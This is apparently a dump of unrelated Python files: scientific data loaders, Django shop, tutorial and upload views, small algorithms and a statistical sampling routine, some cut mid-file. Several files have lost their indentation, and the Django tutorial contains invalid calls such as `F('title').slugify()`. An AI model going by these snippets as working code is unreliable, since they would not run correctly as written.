By default, the first elevation layer is used. If desired you may
specify the elevation value to use.
:type elevation_index: :class:`int`
:param name: (Optional) A name for the loaded dataset.
:type name: :mod:`string`
:param lat_name: (Optional) The latitude variable name to extract from the
dataset.
:type lat_name: :mod:`string`
:param lon_name: (Optional) The longitude variable name to extract from the
dataset.
:type lon_name: :mod:`string`
:param time_name: (Optional) The time variable name to extract from the
dataset.
:type time_name: :mod:`string`
:returns: An OCW Dataset object with the requested variable's data from
the NetCDF file.
:rtype: :class:`dataset.Dataset`
:raises ValueError: When the specified file path cannot be loaded by netCDF4
or when the lat/lon/time variable name cannot be determined
automatically.
'''
try:
netcdf = netCDF4.Dataset(file_path, mode='r')
except RuntimeError:
err = "Dataset filepath is invalid. Please ensure it is correct."
raise ValueError(err)
except:
err = (
"The given file cannot be loaded. Please ensure that it is a valid "
"NetCDF file. If problems persist, report them to the project's "
"mailing list."
)
raise ValueError(err)
if not lat_name:
lat_name = _get_netcdf_variable_name(LAT_NAMES, netcdf, variable_name)
if not lon_name:
lon_name = _get_netcdf_variable_name(LON_NAMES, netcdf, variable_name)
if not time_name:
time_name = _get_netcdf_variable_name(TIME_NAMES, netcdf, variable_name)
lats = netcdf.variables[lat_name][:]
lons = netcdf.variables[lon_name][:]
time_raw_values = netcdf.variables[time_name][:]
times = utils.decode_time_values(netcdf, time_name)
times = numpy.array(times)
values = ma.array(netcdf.variables[variable_name][:])
# If the values are 4D then we need to strip out the elevation index
if len(values.shape) == 4:
# Determine the set of possible elevation dimension names excluding
# the list of names that are used for the lat, lon, and time values.
dims = netcdf.variables[variable_name].dimensions
dimension_names = [dim_name.encode() for dim_name in dims]
lat_lon_time_var_names = [lat_name, lon_name, time_name]
elev_names = set(dimension_names) - set(lat_lon_time_var_names)
# Grab the index value for the elevation values
level_index = dimension_names.index(elev_names.pop())
# Strip out the elevation values so we're left with a 3D array.
if level_index == 0:
values = values[elevation_index, :, :, :]
elif level_index == 1:
values = values[:, elevation_index, :, :]
elif level_index == 2:
values = values[:, :, elevation_index, :]
else:
values = values[:, :, :, elevation_index]
return Dataset(lats, lons, times, values, variable_name, name=name)
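# A minimal usage sketch (illustrative only; the file name and variable name are
# placeholders, and it assumes the returned ocw Dataset exposes the values array
# constructed above).
if __name__ == '__main__':
    ds = load_file('model_output.nc', 'tas', name='example run')
    print(ds.values.shape)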
|
|
store/adminshop/views/taller.py
|
|
|
|
# -*- coding: utf-8 -*-
# @Author: <NAME> <valle>
# @Date: 29-Sep-2017
# @Email: <EMAIL>
# @Last modified by: valle
# @Last modified time: 17-Dec-2017
# @License: Apache license vesion 2.0
from django.db.models import Q
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.conf import settings
from django.contrib.auth.decorators import login_required, permission_required
from adminshop.forms import (TipoTesteoForm, FinTesteoForm, ActuacionesForm, NotasReparacionForm)
from adminshop.models import (Productos, ListaTesteo, Testeo, Presupuesto, Clientes,
Historial, Reparaciones, NotasReparacion,
ESTADO_CHOICES_TESTEO)
from adminshop.utility import save_historial
from tokenapi.http import JsonError, JsonResponse
import threading
def send_men_rep(cliente, estado):
from django.core.mail import send_mail
from django.template.loader import render_to_string
if estado=="OK":
mens = "terminal_reparado"
asunto = "Terminal reparado"
else:
mens = "terminal_no_reparado"
asunto = "Reparacion no viable"
msg_plain = render_to_string(settings.BASE_DIR+'/templates/email/%s.html' % mens,
{'nombre': cliente.nombre_completo})
send_mail(
asunto,
msg_plain,
"<EMAIL>",
[cliente.email],
)
@login_required(login_url='login_tk')
def add_nota_reparacion(request, id_pres):
if request.method == "POST":
f_notas = NotasReparacionForm(request.POST)
if f_notas.is_valid():
notas = f_notas.save(commit=False)
notas.usuario_id = request.user.pk
notas.presupuesto_id = id_pres
presupuesto = Presupuesto.objects.get(pk=id_pres)
notas.save()
return redirect("reparacion", id_producto=presupuesto.producto.pk)
@login_required(login_url='login_tk')
def rm_nota_reparacion(request, id_nota, id_producto):
try:
NotasReparacion.objects.filter(pk=id_nota).delete()
except Exception as e:
pass
return redirect("reparacion", id_producto=id_producto)
@login_required(login_url='login_tk')
def actuaciones(request, id_actuacion=-1):
if not request.method == "POST" and id_actuacion == -1:
f_actuacion = ActuacionesForm()
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": Reparaciones.objects.all(),
"mensaje": "Actuacion nueva"})
elif not request.method == "POST" and id_actuacion > 0:
f_actuacion = ActuacionesForm()
try:
actuacion = Reparaciones.objects.get(pk=id_actuacion)
f_actuacion = ActuacionesForm(instance=actuacion)
except:
pass
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": Reparaciones.objects.all(),
"mensaje": "Editar actuacion"})
elif id_actuacion > 0:
try:
actuacion = Reparaciones.objects.get(pk=id_actuacion)
f_actuacion = ActuacionesForm( request.POST, instance=actuacion)
if f_actuacion.is_valid():
f_actuacion.save()
f_actuacion = ActuacionesForm()
except:
pass
return redirect("actuaciones")
else:
f_actuacion = ActuacionesForm(request.POST)
if f_actuacion.is_valid():
f_actuacion.save()
f_actuacion = ActuacionesForm()
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": Reparaciones.objects.all(),
"mensaje": "Actuacion nueva"})
@login_required(login_url='login_tk')
def rm_actuacion(request, id_actuacion):
try:
Reparaciones.objects.get(pk=id_actuacion).delete()
except:
pass
return redirect("actuaciones")
@login_required(login_url='login_tk')
def find_actuacion_taller(request):
codigo = request.POST['codigo']
datos = Reparaciones.objects.filter(Q(detalle__contains=codigo) |
Q(codigo__contains=codigo))
f_actuacion = ActuacionesForm()
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": datos})
@login_required(login_url='login_tk')
def set_reparado(request, id_producto, estado='OK'):
pres = Presupuesto.objects.filter(producto__pk=id_producto)
if len(pres) > 0:
pres = pres[0]
cliente = pres.cliente
producto = Productos.objects.get(pk=id_producto)
producto.estado = "OK"
producto.save()
# Save the history entry for this action
save_historial(request.user.pk, cliente.pk,
id_producto, "Producto reparado...")
threading.Thread(target=send_men_rep, args=(cliente, estado,)).start()
return redirect("lista_productos", estado='RP')
@login_required(login_url='login_tk')
def reparacion(request, id_producto):
try:
pres = Presupuesto.objects.filter(producto__pk=id_producto)
cliente = Clientes()
if len(pres) > 0:
pres = pres[0]
cliente = pres.cliente
except:
pres = Presupuesto()
form_notas = NotasReparacionForm()
return render (request, "taller/hoja_reparacion.html",
{"c": cliente,
"p": pres,
"notas": NotasReparacion.objects.filter(presupuesto_id=pres.pk),
"form_notas": form_notas})
@login_required(login_url='login_tk')
def save_actuacion(request):
if request.method == "POST":
try:
actuacion = Reparaciones.objects.get(codigo=request.POST.get("codigo"))
except:
actuacion = Reparaciones()
actuacion.codigo=request.POST["codigo"]
actuacion.detalle=request.POST["detalle"]
actuacion.precio=request.POST["precio"].replace(",",".")
actuacion.save()
datos = {
"result": True,
"pk": actuacion.pk,
"codigo": actuacion.codigo,
"can": 1,
"descuento": 0,
"detalle": actuacion.detalle,
"precio": actuacion.precio,
}
return JsonResponse(datos)
return JsonError("Solo puede ser peticiones POST")
@login_required(login_url='login_tk')
def tipo_testeo(request, id_tipo=-1):
if not request.method == "POST" and id_tipo == -1:
f_tipo = TipoTesteoForm()
return render(request, "taller/tipo_testeo.html",
{"form": f_tipo,
"tipos": ListaTesteo.objects.all(),
"mensaje": "Tipo nuevo"})
elif not request.method == "POST" and id_tipo > 0:
f_tipo = TipoTesteoForm()
try:
catergoria = ListaTesteo.objects.get(pk=id_tipo)
f_tipo = TipoTesteoForm(instance=catergoria)
except:
pass
return render(request, "taller/tipo_testeo.html",
{"form": f_tipo,
"tipos": ListaTesteo.objects.all(),
"mensaje": "Editar tipo"})
elif id_tipo > 0:
try:
catergoria = ListaTesteo.objects.get(pk=id_tipo)
f_tipo = TipoTesteoForm( request.POST, instance=catergoria)
if f_tipo.is_valid():
f_tipo.save()
except:
pass
return redirect("tipo_testeo")
else:
f_tipo = TipoTesteoForm(request.POST)
if f_tipo.is_valid():
f_tipo.save()
return redirect("tipo_testeo")
@login_required(login_url='login_tk')
def rm_tipo_testeo(request, id_tipo):
try:
ListaTesteo.objects.get(pk=id_tipo).delete()
except:
pass
return redirect("tipo_testeo")
@login_required(login_url='login_tk')
def testeo(request, id_producto):
producto = Productos.objects.get(pk=id_producto)
return render(request, "taller/testeo.html",{
"p": producto,
"ListaTesteo": ListaTesteo.objects.filter(categoria=producto.modelo.categoria),
"estado_test": ESTADO_CHOICES_TESTEO,
"form": FinTesteoForm(instance=producto)
})
@login_required(login_url='login_tk')
def set_estado_testeo(request, test_id, p_id, estado):
testeos = Testeo.objects.filter(Q(descripcion__pk=test_id) &
Q(producto__pk=p_id))
if len(testeos) > 0:
test = testeos[0]
else:
test = Testeo()
test.producto_id = p_id
test.estado = estado
test.descripcion_id = test_id
test.save()
return HttpResponse("success")
@login_required(login_url='login_tk')
def finalizar_testeo(request):
if request.method == "POST":
p_id = request.POST["p_id"]
producto = Productos.objects.get(pk=p_id)
f_p = FinTesteoForm(request.POST, instance=producto)
if f_p.is_valid():
p = f_p.save()
p.estado = "TD"
p.save()
h = Historial()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
h.producto_id = p.id
h.usuario_id = request.user.id
h.cliente_id = cliente_id
h.detalle = "Finalización del testeo y valoración del producto"
h.save()
return redirect("lista_productos", estado="OS")
@login_required(login_url='login_tk')
def volver_testear_producto(request, id_producto):
p = Productos.objects.get(pk=id_producto)
p.estado = "OS"
p.save()
return redirect("tienda")
|
|
|
|
|
|
from functools import reduce
from operator import mul
def cmb(n, r):
r = min(n - r, r)
if r == 0:
return 1
over = reduce(mul, range(n, n - r, -1), 1)
under = reduce(mul, range(1, r + 1), 1)
return over // under
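# Quick sanity checks for the combination helper above (illustrative, not part
# of the original snippet): C(5, 2) = 10, C(6, 0) = 1, C(52, 5) = 2598960.
if __name__ == '__main__':
    assert cmb(5, 2) == 10
    assert cmb(6, 0) == 1
    print(cmb(52, 5))  # number of 5-card poker hands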
|
|
fmridenoise/utils/traits.py
|
brain-net-cog/fMRIDenoise
|
|
|
import typing as t
from traits.trait_types import Union, TraitType, Instance
from traits.trait_base import _Undefined, Undefined
def Optional(trait: TraitType) -> Union:
"""
Return Union of function argument and Instance(_Undefined)
Args:
trait (TraitType): optional trait
Returns:
union with undefined instance
"""
return Union(trait, Instance(_Undefined))
def remove_undefined(iterable: t.Iterable) -> t.Iterable:
"""
Creates generator that ignores all instances of _Undefined
Args:
iterable (Iterable): objects iterable
Returns:
generator
"""
return (element for element in iterable if element is not Undefined)
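# A small illustrative sketch of how the two helpers compose (the Str trait and
# the example list are assumptions, not part of the original module).
if __name__ == "__main__":
    from traits.trait_types import Str
    maybe_str = Optional(Str())  # accepts either a string trait value or Undefined
    print(list(remove_undefined(["a", Undefined, "b", Undefined])))  # ['a', 'b']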
|
|
aligned/HorizontalMaxPool2D.py
|
LT1st/ReID_Alined_beginer
|
|
|
import torch.nn as nn
class HorizontalMaxPool2d(nn.Module):
def __init__(self):
super(HorizontalMaxPool2d, self).__init__()
def forward(self, x):
inp_size = x.size()
return nn.functional.max_pool2d(input=x, kernel_size=(1, inp_size[3]))
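# A minimal shape check (illustrative only): pooling over the full width of an
# NCHW feature map keeps N, C and H but collapses W to 1.
if __name__ == '__main__':
    import torch
    pool = HorizontalMaxPool2d()
    x = torch.randn(8, 2048, 8, 4)
    print(pool(x).shape)  # torch.Size([8, 2048, 8, 1])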
|
|
02-django/04-queries-and-models/advanced-models.py
|
pjfreeze/platform-engineer-intermediate
|
|
|
## Field Choices
# Yesterday we created several models including the Book model which had a Char field "genre".
# While a free form "genre" field is great, it would be more helpful to specifically categorize
# books by genre, which would require a consistent set.
from django.db import models
from libs import fields as mm_fields
from libs.model_mixins import audit
# This should be really similar to what you ended up with yesterday for the book model based on the
# exercise. We are going to modify down below this one.
class BookOne(audit.CreationAuditMixin, audit.DeletionMixin):
_format = u'{} - title: {}, author: {}, genre: {}'
id = mm_fields.BigAutoField(primary_key=True)
title = models.CharField(max_length=mm_fields.LONG_CHAR_LEN)
author = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN)
# The CharField has a couple arguments we can add to let us restrict the options available
genre = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN)
def __unicode__(self):
return self._format.format(
self.id,
self.title,
self.author,
self.genre,
)
# We can make a generic class that has all of the choices we want by creating properties
# for each one and then a list of all properties that includes all of them, the name choices is not
# important, but whatever we call the collection is what must be referenced down below in the
# BookTwo model.
class Genres(object):
MYSTERY = 'mystery'
SCIENCE = 'science'
HISTORY = 'history'
HUMOR = 'humor'
options = (
(MYSTERY, 'Mystery'),
(SCIENCE, 'Science'),
(HISTORY, 'History'),
(HUMOR, 'Humor'),
)
# Here we have updated the book model's genre field to include some new things that use the Genres
# class we created above. Within Django's admin screen, this will appear as a select drop down.
class BookTwo(audit.CreationAuditMixin, audit.DeletionMixin):
_format = u'{} - title: {}, author: {}, genre: {}'
id = mm_fields.BigAutoField(primary_key=True)
title = models.CharField(max_length=mm_fields.LONG_CHAR_LEN)
author = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN)
# We can add a "choices" keyword and reference the choices list on the Genres class
# This will limit the options a book can use to the list from above
genre = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN, choices=Genres.options)
def __unicode__(self):
return self._format.format(
self.id,
self.title,
self.author,
self.genre,
)
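# A quick illustrative usage sketch (assuming the models above are migrated into
# an app): the Genres constants keep writes and queries consistent.
BookTwo.objects.create(
title='An Example Mystery',
author='A. Author',
genre=Genres.MYSTERY,
)
mysteries = BookTwo.objects.filter(genre=Genres.MYSTERY)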
## ContentTypes
# Yesterday we talked about Foreign Keys and the forward and reverse relationship they create
# between 2 models. Usually 1 model includes a foreign key to the other, which works for many cases.
# For more generic types of content such as tags, comments, or likes, it is unnecessary to create
# a unique model for each "type" of relationship. For example the difference between "liking" an
# organization versus a context is just which model it references.
# Django provides us the contenttypes framework to help us solve problems that situations like the
above can create. Django's contenttypes framework lets us create models with 3 attributes, two
# are more standard fields, one is a placeholder that ends up housing the content we are after.
# Below is an example of how we would use that framework.
class GenericModelOne(models.Model):
# By default we can use a content_type field which can use a normal BigForeignKey to that table which
# has a row created for every model in the whole group of apps.
content_type = mm_fields.BigForeignKey('django.contenttype')
# we can include a BigIntegerField which holds the same information a Foreign Key does,
# (the ID or primary key to the other table), not a foreign key because it is not a specific
# type of object
object_id = models.BigIntegerField()
# You can see we have 1 reference to the type of content and another to the id of the content.
# Together we know what kind and which one of a content type to go get.
# Although we do not currently support serializing the last field (content_object), Django allows
# you to carry that object on the model.
# A model with all of the content types fields looks like this (note the extra
# import for the generic foreign key helper):
from django.contrib.contenttypes import generic
class GenericModelTwo(models.Model):
content_type = mm_fields.BigForeignKey('django.contenttypes')
object_id = models.BigIntegerField()
content_object = generic.GenericForeignKey()
## Q Objects
# The Q object gives us access to more powerful query sets. We can create more powerful conditions
# based and/or. For instance, we could search for a book with that matches the "mystery" genre or
# is by a specific author.
from django.db.models import Q, F
Books.objects.filter(
# Here we are checking for books with the author of me or the title that matches that below.
Q(author="<NAME>") | Q(title="Funny Things I Say")
)
Books.objects.filter(
author__icontains="pet",
).filter(
author__icontains="eze",
)
# We could do a more complex match based on the inclusion of two things
Books.objects.filter(
# We can make sure the author field now contains more than one specific thing
Q(author__icontains="pet") & (Q(author__icontains="eze") | Q(title="Funny Things I Say")),
genre="History",
)
# There are some pretty complex queries using the Q object in the "ContestSummaryFilterBackend" in
# the election view sets.
## F Objects
# F objects let us manipulate the current object based on a current property without having to
# retrieve the value from the database.
# If we have a group of articles, we can assign the first one to be featured only if it has been
# published, without having to go and get the item first. The only thing this set of statements does
# is assignment, rather than retrieval.
article = Article.objects.filter(published=True).first()
article.featured = F('published')
article.save()
# As the documentation notes, the current instance of this article will not reflect the updated
# value because it never retrieved the updated version. Everything was telling the database what
# to do rather than bringing it back into your shell or script.
# Here we have an updated version that would reflect the new value for featured
article = Article.objects.get(pk=article.id)
# Another way you can use the F object is to combine the above statements into a
# single queryset update: filter to the published articles and set featured from
# each row's current published value, without pulling the objects into Python.
Article.objects.filter(published=True).update(
featured=F('published')
)
# We could also have created a slug in a statement that wouldn't even need an
# iterative loop by using a similar syntax:
Article.objects.all().update(
slug=F('title').slugify()
)
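# One more illustrative F-object sketch (view_count is a hypothetical field, not
# defined on the Article model above): incrementing a counter entirely in the
# database avoids a read-modify-write race between requests.
Article.objects.filter(pk=article.id).update(view_count=F('view_count') + 1)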
|
|
|
|
|
|
#!/usr/bin/env python3
def median(data):
"""Finding the median from a list"""
# 1. Sort the list
new_data = sorted(data)
if len(new_data) == 1:
print(new_data[0])
return new_data[0]
else:
# Odd
if len(new_data) % 2 == 1:
mid_value = len(new_data) // 2
print(new_data[mid_value])
return new_data[mid_value]
# Even
elif len(new_data) % 2 == 0:
mid_value = len(data) // 2
median_val = (new_data[mid_value] + new_data[mid_value - 1]) / 2.0
print(median_val)
return median_val
median([10, 5, 3, 7, 8, 23])
|
|
Drosophila/admin_views.py
|
|
|
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from forms import *
from django.template import loader,RequestContext
from django.contrib.admin.views.decorators import staff_member_required
##########################
from models import *
from os import system
##############################################
########Thoughts for implementation##########
#Current state of update########
# Try to add information about assembly. And make it auto updatable
def saveData(uploadedFileName):
uploadedfile = str(uploadedFileName)
# saving input file content
destination = open('/home/DATA/Anmol/DARNED/uploadedFiles/Dmel/%s'%(uploadedfile),'wb+')
for chunk in uploadedFileName.chunks():
destination.write(chunk)
destination.close()
def dataCheck(flname):
infile = open("/home/DATA/Anmol/DARNED/uploadedFiles/Dmel/%s"%(flname))
for line in infile:
data = line[:-1].split('\t')
main = Main.objects.filter(chrom=data[0],coordinate=int(data[1]),strand=data[2])
if len(main) != 0:
pbd = main.filter(pubid__pubid=data[7])
if len(pbd) == 0:
try:
pbdx = PubId.objects.get(pubid=data[7])
except:
pbdx = PubId.objects.create(pubid = data[7],author= data[8],year=int(data[9]))
main[0].pubid.add(pbdx)
else:
main = Main.objects.create(chrom=data[0],coordinate=int(data[1]),strand=data[2], dnanuc="A",rnanuc="I",seqtype = data[4])
if data[3] != '-':
if data[4] == 'E':
main.exotype = data[5]
try:
gene = Gene.objects.get(gene=data[3])
except:
gene = Gene.objects.create(gene=data[3],ncbi='-')
main.gene = gene
if data[6] != '-':
main.alu = data[6]
try:
pbd = PubId.objects.get(pubid=data[7])
except:
pbd = PubId.objects.create(pubid = data[7],author = data[8],year=int(data[9]))
main.pubid.add(pbd)
main.save()
infile.close()
def upload_file(request):
if request.method == 'POST':
form = UploadFileForm(request.POST,request.FILES)
if form.is_valid():
filename = request.FILES['infile']
flname = str(filename)
saveData(request.FILES['infile'])
dataCheck(flname)
# return HttpResponseRedirect('/success/url/')  # Report the successful file upload and logs on a page; redirect via an intermediate file placed in a temp folder
else:
form = UploadFileForm()
toform = {
'form':form,
'action':'/du/'
}
tmplt = loader.get_template('admin/uploadfile.html')
return HttpResponse(tmplt.render(RequestContext(request,toform)))
# return render_to_response('/home/manu/Desktop/DARNED/templates/admin/uploadfile.html',{'form':form})
upload_file = staff_member_required(upload_file)  # This makes the function accessible only to administrators
|
|
resposta_atividade-sem-04-T2/03pt2.py
|
MacgayverPeixoto/PEC_IFPI_186
|
|
|
#03pt2
preco=float(input())
valor=float(input())
valor_percen= preco * valor/100
aumento_percen = preco + valor_percen
desconto_percen = preco - valor_percen
print(f'{aumento_percen:.2f}')
print(f'{desconto_percen:.2f}')
|
|
FeatureCollection/select_by_attributes.py
|
monocilindro/qgis-earthengine-examples
|
|
|
# GitHub URL: https://github.com/giswqs/qgis-earthengine-examples/tree/master/FeatureCollection/select_by_attributes.py
#!/usr/bin/env python
"""Select by attributes
"""
import ee
from ee_plugin import Map
# Select North Dakota and South Dakota
fc = ee.FeatureCollection('TIGER/2018/States') \
.filter(ee.Filter.Or(
ee.Filter.eq('STUSPS', 'ND'),
ee.Filter.eq('STUSPS', 'SD'),
))
image = ee.Image().paint(fc, 0, 2)
# Map.setCenter(-99.844, 37.649, 5)
Map.centerObject(fc, 6)
Map.addLayer(image, {'palette': 'FF0000'}, 'TIGER/2018/States')
|
|
RestFramework 1/api/views.py
|
|
|
|
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from hub.models import Project
from .serializers import ProjectSerializer
def projects_List(request):
"""List all projects
Arguments:
request {HttpRequest} -- the incoming request
"""
if request.method == 'GET':
projects = Project.objects.all()
serializer = ProjectSerializer(projects, many=True)
return JsonResponse(serializer.data, safe=False)
|
|
kpi/visiting_management/urls.py
|
UniversitaDellaCalabria/kpiManagement
|
|
|
from django.urls import path
from . datatables import *
from . views import *
app_name = 'visiting'
# app prefix
prefix = 'visiting'
urlpatterns = [
path(f'{prefix}/', dashboard, name='dashboard'),
# datatables
path(f'{prefix}/<str:structure_slug>/visitings.json',
datatables_structure_visitings, name='structure_visitings_json'),
path(f'{prefix}/<str:structure_slug>/',
structure_visitings, name='structure_visitings'),
path(f'{prefix}/<str:structure_slug>/new/',
new_structure_visiting, name='new_structure_visiting'),
path(f'{prefix}/<str:structure_slug>/<str:visiting_pk>/',
structure_visiting, name='structure_visiting'),
path(f'{prefix}/<str:structure_slug>/<str:visiting_pk>/edit/',
edit_structure_visiting, name='edit_structure_visiting'),
]
|
|
|
anhtumai/data-structure-and-algorithms-collection
|
|
|
"""
Heap is a binary tree-based data structure, can be implemented using a list.
There are 2 types of heaps:
- Max-Heap: the key at the root must be the greatest among the keys present
at all of its children. The same rule applies recursively to every subtree.
- Min-Heap: the key at the root must be the smallest among the keys present
at all of its children. The same rule applies recursively to every subtree.
Heap Public method:
- size() -> int: return the number of elements
- is_empty() -> bool: check if the heap is empty
- peek() -> any: return the root value of the heap
- poll() -> any: remove and return the root value of the heap.
The heap performs self-tuning after removal
- add() -> None: add new element to the heap
For Min Heap only:
- decrease_key(name: any, new_distance: Union[int | float]) -> None:
Find the node with the given name, update its distance to
lesser value (new_distance)
( This function is created specifically for graph finding algorithms,
since we need to update the weight of a path when we find the shorter path.
This function assumes that Node datatype has 'name' and 'distance' property)
"""
from typing import Union
class Heap:
def __init__(self, elems: list[any] = []):
self.elems: list[any] = []
for elem in elems:
self.add(elem)
def _has_left(self, index: int) -> bool:
return index * 2 + 1 < len(self.elems)
def _has_right(self, index: int) -> bool:
return index * 2 + 2 < len(self.elems)
def _has_parent(self, index: int) -> bool:
return index != 0
def _get_parent_index(self, index: int) -> int:
return int((index - 1) / 2)
def _get_left_index(self, index: int) -> int:
return index * 2 + 1
def _get_right_index(self, index: int) -> int:
return index * 2 + 2
def _get_value(self, index: int) -> any:
return self.elems[index]
def _get_left(self, index: int) -> any:
return self._get_value(self._get_left_index(index))
def _get_right(self, index: int) -> any:
return self._get_value(self._get_right_index(index))
def _get_parent(self, index: int) -> any:
return self._get_value(self._get_parent_index(index))
def _heapify_up(self, start: int) -> None:
raise NotImplementedError
def _heapify_down(self, start: int = 0) -> None:
raise NotImplementedError
def size(self) -> int:
return len(self.elems)
def is_empty(self):
return len(self.elems) == 0
def peek(self) -> any:
"""Return the root element of the heap"""
if len(self.elems) == 0:
raise RuntimeError("Heap is empty")
return self.elems[0]
def poll(self) -> any:
"""Return and remove the current root element in the min heap"""
if len(self.elems) == 0:
raise RuntimeError("Heap is empty")
res = self.elems[0]
self.elems[0] = self.elems[-1]
del self.elems[-1]
self._heapify_down()
return res
def add(self, item) -> None:
"""Add new element to the heap and perform self-tuning"""
self.elems.append(item)
self._heapify_up(len(self.elems) - 1)
def __str__(self):
return str(self.elems)
class MinHeap(Heap):
def _heapify_up(self, start: int) -> None:
index = start
while (
self._has_parent(index)
and self._get_value(self._get_parent_index(index)) > self.elems[index]
):
parent_index = self._get_parent_index(index)
self.elems[parent_index], self.elems[index] = (
self.elems[index],
self.elems[parent_index],
)
index = self._get_parent_index(index)
def _heapify_down(self, start: int = 0) -> None:
index = start
while self._has_left(index):
smaller_child_index = self._get_left_index(index)
if self._has_right(index) and self._get_right(index) < self._get_left(
index
):
smaller_child_index = self._get_right_index(index)
if self.elems[index] < self.elems[smaller_child_index]:
return
self.elems[index], self.elems[smaller_child_index] = (
self.elems[smaller_child_index],
self.elems[index],
)
index = smaller_child_index
def decrease_key(self, name: any, new_distance: Union[int, float]) -> None:
"""Find the node with the given name, decrease its distance to new_distance.
Args:
name: name of replaced node
new_distance: new distance of updated node
Assumptions:
Elements in heap tree must have name and distance property
"""
for i in range(len(self.elems)):
if self.elems[i].name == name:
assert (
new_distance < self.elems[i].distance
), "new distance should be lesser than current distance"
self.elems[i].distance = new_distance
self._heapify_up(i)
return
class MaxHeap(Heap):
def _heapify_up(self, start: int) -> None:
index = start
while (
self._has_parent(index)
and self._get_value(self._get_parent_index(index)) < self.elems[index]
):
parent_index = self._get_parent_index(index)
self.elems[parent_index], self.elems[index] = (
self.elems[index],
self.elems[parent_index],
)
index = self._get_parent_index(index)
def _heapify_down(self, start: int = 0) -> None:
index = start
while self._has_left(index):
bigger_child_index = self._get_left_index(index)
if self._has_right(index) and self._get_right(index) > self._get_left(
index
):
bigger_child_index = self._get_right_index(index)
if self.elems[index] > self.elems[bigger_child_index]:
return
self.elems[index], self.elems[bigger_child_index] = (
self.elems[bigger_child_index],
self.elems[index],
)
index = bigger_child_index
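# A short usage sketch (illustrative, not part of the original module): the same
# input yields a different root depending on the heap variant, and repeatedly
# polling a MinHeap returns the elements in ascending order.
if __name__ == "__main__":
    min_heap = MinHeap([5, 3, 8, 1, 9])
    max_heap = MaxHeap([5, 3, 8, 1, 9])
    print(min_heap.peek())  # 1
    print(max_heap.peek())  # 9
    print([min_heap.poll() for _ in range(min_heap.size())])  # [1, 3, 5, 8, 9]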
|
|
|
PetropoulakisPanagiotis/copula
|
|
|
from __future__ import division
from itertools import combinations
from pandas import read_excel
import numpy as np
def birth(currentModel, u, dist, numbrk, q):
sample = len(u)
j = np.count_nonzero(currentModel == 0)
L = len(currentModel) - j
new = np.sort(currentModel)
k = np.random.randint(low=dist, high=sample - dist+1)
w = np.random.uniform(low=np.nextafter(0.0, 1.0))
if j < numbrk and not np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j))):
z = 1
kn = k
new[j - 1] = kn
bir = np.sort(new)
j2 = np.count_nonzero(new == 0)
d = (np.argwhere(bir == kn) + 1)[0][0]
t2 = currentModel[np.sort(currentModel) != 0]
if kn > np.max(t2):
Q = np.ones(numbrk + 1,dtype=int)
Q[:numbrk - j2 - 1] = q[:numbrk - j2 - 1]
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[numbrk - j2 - 1]):
G = 1
del temp[j]
j += 1
a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 1/3:
Q[numbrk - j2 - 1:numbrk - j2 + 1] = list(temp[row - 1])
else:
if a >= 1/3 and a < 2/3:
Q[numbrk - j2 - 1:numbrk - j2 + 1] = list(temp[row - 1])[::-1]
else:
if a >= 2/3:
Q[numbrk - j2 - 1:numbrk - j2 + 1] = np.ones(2,dtype=int) * q[numbrk - j2 - 1]
Q[d - j2+1:numbrk + 1] = Q[d - j2] * np.ones(numbrk - d + j2, dtype=int)
s = np.concatenate((np.asarray([q[numbrk - j2 - 1]]), np.asarray(Q[numbrk - j2 - 1:numbrk - j2 + 1])), axis=0)
else:
if kn < np.min(t2):
Q = np.zeros(numbrk + 1, dtype=int)
Q[2:numbrk + 1] = q[1:numbrk]
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[0]):
G = 1
del temp[j]
j += 1
a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 1/3:
Q[:2] = list(temp[row - 1])
else:
if a >= 1/3 and a < 2/3:
Q[:2] = list(temp[row - 1])[::-1]
else:
if a >= 2/3:
Q[:2] = np.ones(2,dtype=int) * q[0]
s = np.concatenate((np.asarray([q[0]]), Q[:2]), axis=0)
else:
Q = np.zeros(numbrk + 1,dtype=int)
Q[:d - j2 - 1]= q[:d - j2 - 1]
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[d - j2 - 1]):
G = 1
del temp[j]
j += 1
a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 1/3:
Q[d - j2 - 1:d - j2 + 1] = list(temp[row - 1])
else:
if a >= 1/3 and a < 2/3:
Q[d - j2 - 1:d - j2 + 1] = list(temp[row - 1])[::-1]
else:
if a >= 2/3:
Q[d - j2 - 1:d - j2 + 1] = np.ones(2,dtype=int) * q[d - j2 - 1]
Q[d - j2 + 1: numbrk + 1] = q[d - j2:numbrk]
s = np.concatenate((np.asarray([q[d - j2 - 1]]), Q[d - j2 - 1:d - j2 + 1]), axis=0)
elif j == numbrk and not np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j,1))):
Q = np.ones(numbrk + 1,dtype=int)
z = 1
kn = k
new[j - 1] = kn
bir = np.sort(new)
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[0]):
G = 1
del temp[j]
j += 1
